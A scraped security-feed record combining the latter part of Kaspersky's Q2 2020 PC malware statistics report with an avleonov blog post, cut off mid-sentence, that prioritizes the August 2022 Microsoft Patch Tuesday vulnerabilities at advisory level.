([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105102/16-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Geography of attacks**\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of financial malware attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105134/17-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 7.5 \n2 | Uzbekistan | 5.7 \n3 | Tajikistan | 5.6 \n4 | Afghanistan | 2.6 \n5 | Macedonia | 2.6 \n6 | Yemen | 2.2 \n7 | Syria | 1.9 \n8 | Kazakhstan | 1.7 \n9 | Cyprus | 1.7 \n10 | Iran | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users of Kaspersky products whose computers were targeted by financial malware as a share of all unique users of Kaspersky products in the country._\n\nAmong the banking Trojan families, the share of Backdoor.Win32.Emotet decreased markedly from 21.3% to 6.6%. This botnet's activity decreased at the end of Q1 2020, but the results only became clear in the second quarter. However, as we prepared this report, we noticed that Emotet was gradually recovering.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 24.8 | \n2 | RTM | Trojan-Banker.Win32.RTM | 18.6 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.4 | \n4 | Emotet | Backdoor.Win32.Emotet | 6.6 | \n5 | Trickster | Trojan.Win32.Trickster | 4.7 | \n6 | Nimnul | Virus.Win32.Nimnul | 4.3 | \n7 | Danabot | Trojan-Banker.Win32.Danabot | 3.4 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.0 | \n9 | Nymaim | Trojan.Win32.Nymaim | 2.5 | \n10 | Neurevt | Trojan.Win32.Neurevt | 1.4 | \n \n_** Unique users attacked by this __malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trend highlights\n\nThe attackers behind the Shade ransomware announced that they had ceased to distribute the Trojan. In addition, they published keys to decrypt files affected by all of its versions. The number of keys that had been accumulated over the years exceeded 750,000, and we [updated](<https://www.kaspersky.com/blog/shade-decryptor-2020/35246/>) our ShadeDecryptor utility to help Shade victims to regain access to their data.\n\nRansomware written in Go began surfacing more often than before. Examples of recently discovered Trojans include Sorena, Smaug, Hydra, Satan/M0rphine, etc. What is this: hackers showing an interest in new technology, ease of development or an attempt at making researchers' work harder? No one knows for sure.\n\n### Number of new modifications\n\nWe detected five new ransomware families and 4,406 new modifications of these malware programs in Q2 2020.\n\n_Number of new ransomware modifications detected, Q2 2019 \u2013 Q1 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105223/sl_malware_q2_pc_03_18-malware_q2-2020_stats_non-mobile.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nKaspersky products and technologies protected 154,720 users from ransomware attacks in Q2 2020.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105258/19-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105418/20-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.69% \n2 | Mozambique | 1.16% \n3 | Uzbekistan | 1.14% \n4 | Egypt | 0.97% \n5 | Ethiopia | 0.94% \n6 | China | 0.74% \n7 | Afghanistan | 0.67% \n8 | Pakistan | 0.57% \n9 | Vietnam | 0.55% \n10 | Mongolia | 0.49% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by Trojan encryptors as a share of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 14.74% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.42% | \n3 | (generic verdict) | Trojan-Ransom.Win32.Generic | 7.47% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 7.11% | \n5 | Stop | Trojan-Ransom.Win32.Stop | 7.06% | \n6 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.68% | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.28% | \n8 | (generic verdict) | Trojan-Ransom.Win32.Phny | 3.29% | \n9 | Cerber | Trojan-Ransom.Win32.Zerber | 2.19% | \n10 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.16% | \n| | | | | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users __attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nKaspersky solutions detected 3,672 new miner modifications in Q2 2020, which is several dozen times fewer than in the previous quarter.\n\n_Number of new miner modifications, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105534/21-en-malware_q2-2020_stats_non-mobile.png>))_\n\nThe difference can be explained by thousands of modifications of one miner family, which were detected in the first quarter. In the quarter under review, that miner's activity dwindled, which is reflected in the statistics.\n\n### Number of users attacked by miners\n\nWe detected miner attacks on the computers of 440,095 unique Kaspersky users worldwide in Q2 2020. This type of threats shows a clear downward trend.\n\n_Number of unique users attacked by miners, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105631/22-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Geography of attacks\n\n_Geography of miner attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105702/23-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.08% \n2 | Ethiopia | 4.04% \n3 | Uzbekistan | 2.68% \n4 | Tanzania | 2.57% \n5 | Vietnam | 2.17% \n6 | Rwanda | 2.11% \n7 | Kazakhstan | 2.08% \n8 | Sri Lanka | 1.97% \n9 | Mozambique | 1.78% \n10 | Belarus | 1.41% \n \n_* Excluded are countries with relatively few Kaspersky product users (under 50,000). \n** Unique users whose computers were attacked by miners as a share of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nExploit distribution statistics for Q2 2020, as before, show that vulnerabilities in the Microsoft Office suite are the most common ones. However, their share decreased to 72% in the last quarter. The same vulnerabilities we had seen before still topped the list. [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows inserting a malicious script into an OLE object placed inside an Office document, was the most commonly exploited vulnerability. It was followed by the Q1 favorite, [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This vulnerability exploits a stack overflow error in the Equation Editor component of the Office suite. CVE-2017-8570, a vulnerability similar to [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), came third. The remaining positions on the TOP 5 list were occupied by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)\n\nThe second category (exploits for popular browsers) accounted for about 12% in Q2, its share increasing slightly when compared to the previous period. During the reporting period, cybercriminals attacked Firefox using the [CVE-2020-6819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6819>) vulnerability, which allows malicious code to be executed when an HTTP header is parsed incorrectly. Exploits that use the vulnerabilities in the ReadableStream interface, such as [CVE-2020-6820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6820>), have been observed as well. No major vulnerability exploited to spread malware was observed during the reporting period for any of the other popular browsers: Google Chrome, Microsoft Edge, or Internet Explorer. However, fixes for a number of vulnerabilities that could potentially have been used for creating exploits, but were detected by researchers in time, were announced to software manufacturers.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105735/sl_malware_q2_pc_09_24-malware_q2-2020_stats_non-mobile.png>))_\n\nThe first quarter set a trend for researching font and other graphic primitives subsystems in Windows. In Q2, two vulnerabilities were discovered in Windows Codecs Library, assigned [CVE-2020-1425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425>) and [CVE-2020-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457>) codes. Both were fixed, and neither is known to have been exploited in the wild. Another interesting vulnerability fixed in the last quarter is [CVE-2020-1300.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>) It allows for remote execution of code due to incorrect processing of Cabinet files, for example, if the user is trying to run a malicious CAB file pretending to be a printer driver. Notably, the [CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) vulnerability allowed the attacker to execute arbitrary code with the user's privileges by generating a specially formatted LNK file.\n\nThe trend for brute-forcing of Remote Desktop Services, Microsoft SQL Services and SMB access passwords persisted in Q2 2020. No full-on network attacks that exploited new vulnerabilities in network exchange protocols were detected. However, software developers did discover and fix several vulnerabilities in popular network services. Among the most interesting ones were [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>) for SMBv1, which allowed the attacker to execute code remotely on a target system. [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SmbGhost), a popular SMBv3 vulnerability among researchers, received unexpected follow-up in the form of an exploit that allowed compromising the system without interacting with the user. The same protocol version was found to contain an error, designated as [CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and known as the SMBleed vulnerability, which allowed the attacker to get a portion of the Windows kernel memory. The researchers even published several exploit versions that used a bundle of SMBleed and SMBGhost to execute the code with system privileges. In that mode, the attacker can install any software and access any information on the computer.\n\n## Attacks on Apple macOS\n\nIn Q2 2020, we discovered new versions of previously known threats and one new backdoor, which received the verdict of Backdoor.OSX.Lador.a. The malware is notable for being written in Go, a language gaining popularity as a means to create malware aimed at the macOS platform. If you compare the size of the Lador file with any backdoor created in Objective C, the difference will be very significant: the size of a Lador file is 5.5 megabytes, i.e. many times larger. And all this for the sake of remote access to the infected machine and execution of arbitrary code downloaded from the control center.\n\n**Top 20 threats for macOS **\n\n| Verdict | %* \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 17.39 \n2 | Trojan-Downloader.OSX.Shlayer.a | 12.07 \n3 | AdWare.OSX.Pirrit.j | 9.10 \n4 | AdWare.OSX.Bnodlero.at | 8.21 \n5 | AdWare.OSX.Cimpli.k | 7.32 \n6 | AdWare.OSX.Pirrit.o | 5.57 \n7 | Trojan-Downloader.OSX.Agent.h | 4.19 \n8 | AdWare.OSX.Ketin.h | 4.03 \n9 | AdWare.OSX.Pirrit.x | 4.00 \n10 | AdWare.OSX.Spc.a | 3.98 \n11 | AdWare.OSX.Amc.c | 3.97 \n12 | Backdoor.OSX.Lador.a | 3.91 \n13 | AdWare.OSX.Pirrit.v | 3.22 \n14 | RiskTool.OSX.Spigot.a | 2.89 \n15 | AdWare.OSX.Bnodlero.t | 2.87 \n16 | AdWare.OSX.Cimpli.f | 2.85 \n17 | AdWare.OSX.Adload.g | 2.60 \n18 | AdWare.OSX.Pirrit.aa | 2.54 \n19 | AdWare.OSX.MacSearch.d | 2.44 \n20 | AdWare.OSX.Adload.h | 2.35 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nThe rankings of the most common threats for the macOS platform has not changed much compared to the previous quarter and is still largely made up of adware. As in Q1 2020, Shlayer (12.07%) was the most common Trojan. That malware loads adware from the Pirrit, Bnodlero and Cimpli families, which populate our TOP 20.\n\nThe Lador.a backdoor, which we mentioned above, entered the rankings along with adware.\n\nFinally, in Q2 2020, a group of potentially unwanted programs collectively detected as HistGrabber.b joined the rankings. The main purpose of such software is to unpack archives, but HistGrabber.b also quietly uploaded the user's browsing history to the developer's servers. This is [nothing new](<https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html>): all applications that steal browsing history have long been withdrawn from the App Store, and servers that could receive the data, disabled. Nevertheless, we deem it necessary to inform users of any such software discovered on their devices.\n\n### Threat geography\n\n_Threat geography for the macOS platform, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105816/25-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 9.82% \n2 | France | 7.73% \n3 | Mexico | 6.70% \n4 | Italy | 6.54% \n5 | India | 6.47% \n6 | Canada | 6.34% \n7 | Brazil | 6.25% \n8 | USA | 5.99% \n9 | United Kingdom | 5.90% \n10 | Russia | 5.77% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for MacOS (under 5,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky security solutions for MacOS in the same country._\n\nThe most common threats in all the countries on the list without exception bundled various adware with the Shlayer Trojan.\n\n## IoT attacks\n\n### IoT threat statistics\n\nQ2 2020 saw no dramatic change in cybercriminal activity targeting IoT devices: attackers most frequently ran Telnet login and password brute-force campaigns.\n\nTelnet | 80.83% \n---|--- \nSSH | 19.17% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2020_\n\nFurther communication with IoT devices that pretended to be infected (and actually traps), was much more often conducted via Telnet.\n\nTelnet | 71.52% \n---|--- \nSSH | 28.48% \n \n_Distribution of cybercriminals' working sessions with Kaspersky traps, Q2 2020_\n\n_Geography of IP addresses of device from which attacks on Kaspersky Telnet traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105906/26-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which Telnet-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 12.75% \nBrazil | 11.88% \nEgypt | 8.32% \nTaiwan | 6.58% \nIran | 5.17% \nIndia | 4.84% \nRussia | 4.76% \nVietnam | 3.59% \nGreece | 3.22% \nUSA | 2.94% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of devices_\n\nThe three countries with the most devices that launched attacks on Kaspersky Telnet traps remained virtually unchanged. China (12.75%) was first, while Brazil (11.88%) and Egypt (8.32%) swapped positions.\n\n_Geography of IP addresses of device from which attacks on Kaspersky SSH traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105939/27-en-malware_q2-2020_stats_non-mobile.png>))_\n\n**TOP 10 countries by location of devices from which SSH-based attacks were carried out on Kaspersky traps**\n\n**Country** | **%*** \n---|--- \nChina | 22.12% \nUSA | 10.91% \nVietnam | 8.20% \nBrazil | 5.34% \nGermany | 4.68% \nRussia | 4.44% \nFrance | 3.42% \nIndia | 3.01% \nEgypt | 2.77% \nSingapore | 2.59% \n \n_* Share of devices from which attacks were carried out in the country out of the total number of devices_\n\nAs with Telnet, the three countries where the most attacks on SSH traps originated remained unchanged from Q1 2020: China (22.12%), U.S. (10.91%) and Vietnam (8.20%).\n\n### Threats loaded into traps\n\n**Verdict** | **%*** \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 32.78 \nBackdoor.Linux.Mirai.b | 17.47 \nHEUR:Backdoor.Linux.Mirai.b | 12.72 \nHEUR:Backdoor.Linux.Gafgyt.a | 9.76 \nBackdoor.Linux.Mirai.ba | 7.99 \nHEUR:Backdoor.Linux.Mirai.ba | 4.49 \nBackdoor.Linux.Gafgyt.bj | 2.23 \nHEUR:Trojan-Downloader.Shell.Agent.p | 1.66 \nBackdoor.Linux.Mirai.cn | 1.26 \nHEUR:Backdoor.Linux.Mirai.c | 0.73 \n \n_* Share of the malware type in the total amount of malware downloaded to IoT devices following a successful attack._\n\nAs in the first quarter, the NyaDrop Trojan led by the number of loads onto traps. The Mirai Trojan family retained its relevance in Q2 2020, occupying half of our IoT threat rankings.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C2 centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2020, Kaspersky solutions defeated 899,744,810 attacks launched from online resources located in 191 countries across the globe. A total of 286,229,445 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110037/28-en-malware_q2-2020_stats_non-mobile.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **_Malware class_**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 11.2052 \n2 | Mongolia | 11.0337 \n3 | Albania | 9.8699 \n4 | France | 9.8668 \n5 | Tunisia | 9.6513 \n6 | Bulgaria | 9.5252 \n7 | Libya | 8.5995 \n8 | Morocco | 8.4784 \n9 | Greece | 8.3735 \n10 | Vietnam | 8.2298 \n11 | Somalia | 8.0938 \n12 | Georgia | 7.9888 \n13 | Malaysia | 7.9866 \n14 | Latvia | 7.8978 \n15 | UAE | 7.8675 \n16 | Qatar | 7.6820 \n17 | Angola | 7.5147 \n18 | R\u00e9union | 7.4958 \n19 | Laos | 7.4757 \n20 | Mozambique | 7.4702 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a share of all unique Kaspersky users in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 5.73% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110110/29-en-malware_q2-2020_stats_non-mobile.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs included in complex installers, encrypted files, etc.)._\n\nIn Q2 2020, our File Anti-Virus detected **80,993,511** malware and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 48.0224 \n2 | Uzbekistan | 42.2632 \n3 | Tajikistan | 42.1279 \n4 | Ethiopia | 41.7213 \n5 | Afghanistan | 40.6278 \n6 | Myanmar | 39.1377 \n7 | Burkina Faso | 37.4560 \n8 | Benin | 37.4390 \n9 | China | 36.7346 \n10 | Kyrgyzstan | 36.0847 \n11 | Vietnam | 35.4327 \n12 | Mauritania | 34.2613 \n13 | Laos | 34.0350 \n14 | Mongolia | 33.6261 \n15 | Burundi | 33.4323 \n16 | Belarus | 33.0937 \n17 | Guinea | 33.0097 \n18 | Mali | 32.9902 \n19 | Togo | 32.6962 \n20 | Cameroon | 32.6347 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n__** Unique users on whose computers **Malware-class** local threats were blocked, as a share of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110144/30-en-malware_q2-2020_stats_non-mobile.png>))_\n\nOverall, 17.05% of user computers globally faced at least one **Malware-class** local threat during Q2 2020.", "cvss3": {}, "published": "2020-09-03T10:30:23", "type": "securelist", "title": "IT threat evolution Q2 2020. PC statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2020-0796", "CVE-2020-1206", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1425", "CVE-2020-1457", "CVE-2020-6819", "CVE-2020-6820"], "modified": "2020-09-03T10:30:23", "id": "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "href": "https://securelist.com/it-threat-evolution-q2-2020-pc-statistics/98292/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-08-23T02:01:34", "description": "Hello everyone! In this episode, let's take a look at the Microsoft Patch Tuesday August 2022 vulnerabilities. I use my [Vulristics](<https://github.com/leonov-av/vulristics>) vulnerability prioritization tool as usual. I take comments for vulnerabilities from Tenable, Qualys, Rapid7, ZDI and Kaspersky blog posts. Also, as usual, I take into account the vulnerabilities added between the July and August Patch Tuesdays.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239098>\n\nThere were 147 vulnerabilities. Urgent: 1, Critical: 0, High: 36, Medium: 108, Low: 2.\n\nThere was a lot of great stuff this Patch Tuesday. There was a critical exploited in the wild MSDT DogWalk vulnerability, 3 critical Exchange vulnerabilities that could be easily missed in prioritization, 13 potentially dangerous vulnerabilities, 2 funny vulnerabilities and 3 mysterious ones. Let's take a closer look.\n \n \n $ cat comments_links.txt \n Qualys|August 2022 Patch Tuesday. Microsoft Releases 121 Vulnerabilities with 17 Critical, plus 20 Microsoft Edge (Chromium-Based); Adobe Releases 5 Advisories|https://blog.qualys.com/vulnerabilities-threat-research/2022/08/09/august-2022-patch-tuesday\n ZDI|THE AUGUST 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/8/9/the-august-2022-security-update-review\n Kaspersky|DogWalk and other vulnerabilities|https://www.kaspersky.com/blog/dogwalk-vulnerability-patch-tuesday-08-2022/45127/\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"August\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n MS PT Year: 2022\n MS PT Month: August\n MS PT Date: 2022-08-09\n MS PT CVEs found: 121\n Ext MS PT Date from: 2022-07-13\n Ext MS PT Date to: 2022-08-08\n Ext MS PT CVEs found: 26\n ALL MS PT CVEs: 147\n ...\n\n## DogWalk\n\n**Remote Code Execution** in Microsoft Windows Support Diagnostic Tool (MSDT) (CVE-2022-34713), dubbed **DogWalk**. The only Urgent level vulnerability. The Microsoft Support Diagnostic Tool (MSDT) is a service in Microsoft Windows that allows Microsoft technical support agents to analyze diagnostic data remotely for troubleshooting purposes. DogWalk vulnerability allows code execution when MSDT is called using the URL protocol from a calling application, typically Microsoft Word. There is an element of social engineering to this as a threat actor would need to convince a user to click a link or open a document. Exploitability Assessment: Exploitation in the wild detected. The existence of a public exploit is mentioned in Microsoft CVSS Temporal Score (Functional Exploit). But it is not yet available in public exploit packs. DogWalk is similar to MSDT RCE **Follina** (CVE-2022-30190), which made some hype in May of this year. It\u2019s not clear if this vulnerability is the result of a failed patch or something new. \n\n## 3 Microsoft Exchange EOPs\n\n**Elevation of Privilege** in Microsoft Exchange (CVE-2022-21980, CVE-2022-24516, CVE-2022-24477). I will not hide, this vulnerabilities were not detected as critical by Vulristics, only as Medium. This happened due to the fact that this are not RCEs, but EOPs. No public exploit or sign of exploitation in the wild. But these vulnerabilities are very critical, due to the fact that Exchange is often accessible from the Internet. And because of details about the vulnerability, which is only highlighted by ZDI. These bugs could allow an authenticated attacker to take over the mailboxes of all Exchange users, read and send emails or download attachments from any mailbox on the Exchange server. This gives access to valuable data and great opportunities for developing an attack. Administrators will also need to enable Extended Protection to fully address these vulnerabilities.\n\nit is not clear how to highlight such vulnerabilities automatically, because there are few formal signs. Apparently it is required to raise the priority of the software available on the perimeter and software that operates with important data.\n\n## 13 potentially dangerous vulnerabilities\n\n 1. **Remote Code Execution** in Windows Point-to-Point Protocol (PPP) (CVE-2022-30133, CVE-2022-35744). The Point-to-Point Protocol (PPP) is the default RAS (remote access service) protocol in Windows and is a data link-layer protocol used to encapsulate higher network-layer protocols to pass over synchronous and asynchronous communication lines. Both vulnerabilities allow attackers to send requests to the remote access server, which can lead to the execution of malicious code on the machine. And both have the same CVSS score: 9.8. This vulnerabilities can only be exploited by communicating via Port 1723. As a temporary workaround prior to installing the updates that address this vulnerability, you can block traffic through that port thus rendering the vulnerability unexploitable. Warning: Disabling Port 1723 could affect communications over your network. Exploitability Assessment: Exploitation Less Likely\n 2. **Remote Code Execution **in Windows Secure Socket Tunneling Protocol (SSTP) (CVE-2022-35766, CVE-2022-35794). SSTP is a VPN tunneling protocol designed to secure your online traffic. Successful exploitation of this vulnerability requires an attacker to win a race condition. An unauthenticated attacker could send a specially crafted connection request to a RAS (remote access service) server, which could lead to remote code execution (RCE) on the RAS server machine. Exploitability Assessment: Exploitation Less Likely\n 3. **Remote Code Execution** in SMB Client and Server (CVE-2022-35804). The server side of this vulnerability would allow a remote, unauthenticated attacker to execute code with elevated privileges on affected SMB servers. Interestingly, this bug only affects Windows 11, which implies some new functionality introduced this vulnerability. Either way, this could potentially be wormable between affected Windows 11 systems with SMB server enabled. Disabling SMBv3 compression is a workaround for this bug, but applying the update is the best method to remediate the vulnerability. This vulnerability is reminiscent of past SMB vulnerabilities such as the EternalBlue SMBv1 flaw patched in MS17-010 in March of 2017 that was exploited as part of the [WannaCry](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>) incident in addition to the more recent CVE-2020-0796 \u201cEternalDarkness\u201d RCE flaw in SMB 3.1.1.\n 4. **Remote Code Execution** in Visual Studio (CVE-2022-35777, CVE-2022-35825, CVE-2022-35826, CVE-2022-35827). The existence of a public exploit is mentioned in Microsoft CVSS Temporal Score (Proof-of-Concept Exploit). None of the vendors highlighted these vulnerabilities. But it seems that this can be used in targeted phishing against developers.\n 5. **Elevation of Privilege** in Active Directory (CVE-2022-34691). An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System. The advisory notes that exploitation is only possible when Active Directory Certificate Services is running on the domain. Exploitability Assessment: Exploitation Less Likely.\n 6. **Remote Code Execution** in Windows Network File System (CVE-2022-34715). This is now the fourth month in a row with an NFS code execution patch. To exploit this, a remote, unauthenticated attacker would need to make a specially crafted call to an affected NFS server. This would provide the threat actor with code execution at elevated privileges. Although we have not yet seen the actual exploitation of such vulnerabilities.\n 7. **Elevation of Privilege **in Windows Print Spooler (CVE-2022-35793, CVE-2022-35755). The Print Spooler is software built into the Windows operating system that temporarily stores print jobs in the computer's memory until the printer is ready to print them. CVE-2022-35755 can be exploited using a specially crafted \u201cinput file,\u201d while exploitation of CVE-2022-35793 requires a user click on a specially crafted URL. Both would give the attacker SYSTEM privileges. Both vulnerabilities can be mitigated by disabling the Print Spooler service, but CVE-2022-35793 can also be mitigated by disabling inbound remote printing via Group Policy.\n\n## 2 funny vulnerabilities\n\n 1. Vulristics suddenly highlighted the **Memory Corruption** in Microsoft Edge (CVE-2022-2623) vulnerability because there is a public exploit for it. It turned out that there was a bug in the exploit databases: 0day.today and packetstorm. CVE-2022-2623 was mistakenly written instead of CVE-2022-26233. And this also happens and no one checks it. Well, prioritization of vulnerabilities based on distorted source data does not work well.\n 2. **Denial of Service** - Microsoft Outlook (CVE-2022-35742). This was reported through the ZDI program and is a mighty interesting bug. Sending a crafted email to a victim causes their Outlook application to terminate immediately. Outlook cannot be restarted. Upon restart, it will terminate again once it retrieves and processes the invalid message. It is not necessary for the victim to open the message or to use the Reading pane. The only way to restore functionality is to access the mail account using a different client (i.e., webmail, or administrative tools) and remove the offending email(s) from the mailbox before restarting Outlook.\n\n## 3 mysterious vulnerabilities\n\n * CERT/CC: CVE-2022-34303 Crypto Pro Boot Loader Bypass\n * CERT/CC: CVE-2022-34301 Eurosoft Boot Loader Bypass\n * CERT/CC: CVE-2022-34302 New Horizon Data Systems Inc Boot Loader Bypass\n\nThey came from the US CERT Coordination Center.\n\n 1. No one writes anything about them, only Tenable. "security bypass vulnerabilities in a third-party driver affecting Windows Secure Boot". \n 2. Maybe this is of course a coincidence and we are talking about other software, but isn't Crypto Pro a Russian [CryptoPro](<https://www.cryptopro.ru/>), "the company\u2019s main activity is cryptographic software development and public key infrastructure solutions based on national and international standards."?\n 3. Isn't Eurosoft a [Russian Eurosoft](<http://eurosoft.ru/>), "software for architectural design"? \n\nIt's all very 